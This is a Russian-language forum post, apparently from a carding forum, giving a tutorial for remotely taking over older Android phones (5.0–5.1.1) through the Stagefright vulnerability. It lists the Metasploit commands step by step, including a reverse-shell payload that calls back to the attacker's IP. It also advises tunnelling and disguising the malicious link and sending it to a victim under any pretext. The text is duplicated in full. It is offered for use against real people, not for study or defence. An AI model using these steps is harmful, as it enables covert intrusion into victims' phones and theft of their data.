Carder
Professional
- Messages
- 2,619
- Reaction score
- 1,921
- Points
- 113
Привет, друзья. Сегодня мы будем использовать утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android.
Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).
Инструкция по установке:
Установка Metasploit на Termux — https://codeby.net/threads/ustanovka-metasploit-na-termux.68433/
Установка Metasploit на Linux — https://itsecforu.ru/2018/09/26/как-установить-metasploit-framework-на-ubuntu-linux-mint/
Если у вас Kali Linux https://www.kali.org/downloads/, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — https://www.exploit-db.com/exploits/40436 и закидываем в папку с эксплоитами.
Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — https://pastebin.com/64LF7tXk.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.
Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).
Инструкция по установке:
Установка Metasploit на Termux — https://codeby.net/threads/ustanovka-metasploit-na-termux.68433/
Установка Metasploit на Linux — https://itsecforu.ru/2018/09/26/как-установить-metasploit-framework-на-ubuntu-linux-mint/
Если у вас Kali Linux https://www.kali.org/downloads/, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — https://www.exploit-db.com/exploits/40436 и закидываем в папку с эксплоитами.
Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — https://pastebin.com/64LF7tXk.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.
